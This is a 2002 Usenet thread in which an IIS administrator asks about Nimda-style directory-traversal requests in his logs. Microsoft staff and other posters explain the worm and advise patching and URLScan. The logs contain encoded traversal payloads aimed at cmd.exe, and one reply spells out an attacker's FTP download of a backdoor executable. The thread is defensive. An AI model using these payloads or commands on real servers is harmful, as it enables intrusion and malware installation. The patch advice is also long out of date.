GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
Olaf Coolic
I get following log entries in my iis logging files (see below).
my question,
How do hackers test if spesific commands are executable on my server (see
below)??
I want to check my server before the hackers do that!
where can I find the syntax for that like: ..%5c or ../..%5c../..%
etc...
thanks
olaf
2002-12-24 21:12:56 195.175.201.169 - 192.168.1.20 80 GET /scripts/root.exe
/c+dir 401 -
2002-12-24 21:13:00 195.175.201.169 - 192.168.1.20 80 GET /MSADC/root.exe
/c+dir 401 -
2002-12-24 21:13:05 195.175.201.169 - 192.168.1.20 80 GET
/c/winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:09 195.175.201.169 - 192.168.1.20 80 GET
/d/winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:13 195.175.201.169 - 192.168.1.20 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:18 195.175.201.169 - 192.168.1.20 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:23 195.175.201.169 - 192.168.1.20 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:27 195.175.201.169 - 192.168.1.20 80 GET
/msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe
/c+dir 401 -
2002-12-24 21:13:32 195.175.201.169 - 192.168.1.20 80 GET
/scripts/..チ ../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:38 195.175.201.169 - 192.168.1.20 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:45 195.175.201.169 - 192.168.1.20 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:54 195.175.201.169 - 192.168.1.20 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:14:00 195.175.201.169 - 192.168.1.20 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:14:08 195.175.201.169 - 192.168.1.20 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:14:16 195.175.201.169 - 192.168.1.20 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:14:24 195.175.201.169 - 192.168.1.20 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:47:18 195.199.176.109 - 192.168.1.20 80 GET
/scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir 401 -
Richard O'Brien [MS]
Firstly, make sure that your IIS servers are up-to-date with the latest
service packs and security updates. Check out
http://www.microsoft.com/security. You can use WindowsUpdate
(http://www.microsoft.com/windowsupdate) or the new Microsoft Base Security
Analyser V1.1 (http://www.microsoft.com/security - a link is on this page to
download).
Also, consider implementing URLScan
(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security
/tools/tools/urlscan.asp) that will stop the use of malicious URL's like the
ones you are getting in your logs. Be careful to read all the documentation
so that you will be sure it does not stop your website from working
correctly.
Richard.
--
This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use. ゥ 2001 Microsoft Corporation. All rights
reserved.
"Olaf Coolic" <olaf....@chello.at> wrote in message
news:ewvrAm7rCHA.1776@TK2MSFTNGP09...
Lisa Cozzens [MSFT]
Those are classic symptoms of an attempted Nimda attack, which means that
there probably isn't a real live person trying to hack into your box. Most
likely it's another machine that's been infected with Nimda, since a
Nimda-infected machine then tries to go off and infect other machines. This
is basically a trial-and-error process. It's trying to exploit a couple of
known holes in IIS. Fortunately, based on the status codes returned (those
401's), it looks like your machine is properly patched, so those holes
aren't open. If the holes *were* open, the Nimda-infected machine would
recognize this because it would receive a status code of 200, indicating
success. Then it would be able to use those holes to do some damage.
As for checking your server, you can use those exact URL strings from the
log file to build your own URL. Using the first line of the log below as an
example, you could try going to:
http://yourservername/scripts/root.exe /c+dir
If your server is properly patched, you'll get back an error -- probably a
401, 403, or 404. If your server is NOT properly patched, you'll see a
directory listing. (That's all that command is doing -- it's trying to run
the dir command)
And as Richard said, the best way to make sure you're not vulnerable to
worms like this is to stay up-to-date on your security patches. At a
minimum, you'll want to install the latest service pack for Windows (SP6a
for NT4, SP3 for Win2k, or SP1 for XP), followed by the latest IIS
cumulative security patch:
http://www.microsoft.com/technet/security/bulletin/MS02-062.asp
Here's the link to the IIS Lockdown Tool as well:
http://www.microsoft.com/downloads/release.asp?ReleaseID=43955
You'll want to read this KB article for more information on installing and
configuring it:
Q325864 HOW TO: Install and Use the IIS Lockdown Wizard
http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q325864
Hope this helps,
Lisa
--------------------
> From: "Olaf Coolic" <olaf....@chello.at>
> Subject: GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
> Date: Mon, 30 Dec 2002 05:08:51 +0100
> Lines: 52
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Newsreader: Microsoft Outlook Express 6.00.2800.1106
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
> Message-ID: <ewvrAm7rCHA.1776@TK2MSFTNGP09>
> Newsgroups: microsoft.public.inetserver.iis
> NNTP-Posting-Host: chello080110094066.507.15.vie.surfer.at 80.110.94.66
> Path: cpmsftngxa09!TK2MSFTNGP08!TK2MSFTNGP09
> Xref: cpmsftngxa09 microsoft.public.inetserver.iis:239670
> X-Tomcat-NG: microsoft.public.inetserver.iis
-----
Please do not send email directly to this alias. This is an online
account name for newsgroup participation only.
This posting is provided "AS IS" with no warranties, and confers
no rights. You assume all risk for your use.
ゥ 2002 Microsoft Corporation. All rights reserved.
John Wood
<olaf....@chello.at> writes
>I get following log entries in my iis logging files (see below).
>
>my question,
>How do hackers test if spesific commands are executable on my server (see
>below)??
>I want to check my server before the hackers do that!
they are using the IIS virtual directories (such as SCRIPTS) and then
trying to get back up the physical directory structure to get to a place
where they can issue a DOS command (such as CMD.EXE). If successful,
then they will issue an FTP to bring down files from their computer to
yours and laydown all the backdoor stuff or just do what they want
you need a firewall, quickly
John Wood
Olaf Coolic
What should I block on the Firewall?????
I need HTTP/SMTP/IMAP. All other ports are cblocked!!!
Thanks
Olaf
"John Wood" <jo...@lortim.demon.co.uk> wrote in message
news:O4agyLAA...@lortim.demon.co.uk...
John Wood
<olaf....@chello.at> writes
>How can they install an FTP-Service on my Server???
>
>What should I block on the Firewall?????
>I need HTTP/SMTP/IMAP. All other ports are cblocked!!!
>
>Thanks
>Olaf
they. If their machine is on (say) 111.222.3.4 and they can get to the
MSDOS command CMD.EXE (which is what they are trying to do, I know
because it happened to me) then they issue to the command line
FTP 111.222.3.4
user
pw
get bugsgalore.exe
and now you are toast!
I don't know what "cblocking" is
you need also to stop anonymous user getting a user list which then
allows a dictionary attack on named users, resulting in their
deactivation if your policies are that way inclined (been there too)
I can help if you are windows, not if Unix/Linux
you can contact me offline to get some rules I use
john at lortim.demon.co.uk
John Wood
BB
to patch your server up to date, refer
www.microsoft.com/security/
then get urlscan and related tools in this kb
Resources for Securing Internet Information Services
http://support.microsoft.com/?id=282060
Rgds.
"Olaf Coolic" <olaf....@chello.at> wrote in message
news:#SbhojZsCHA.868@TK2MSFTNGP12...
Tim Coffey
probably want to rebuild first.
Thank you. I hope this information is helpful.
Tim Coffey [MSFT]
This posting is provided “AS IS” with no warranties, and confers no rights.
You assume all risk for your use. © 2001 Microsoft Corporation. All rights
reserved.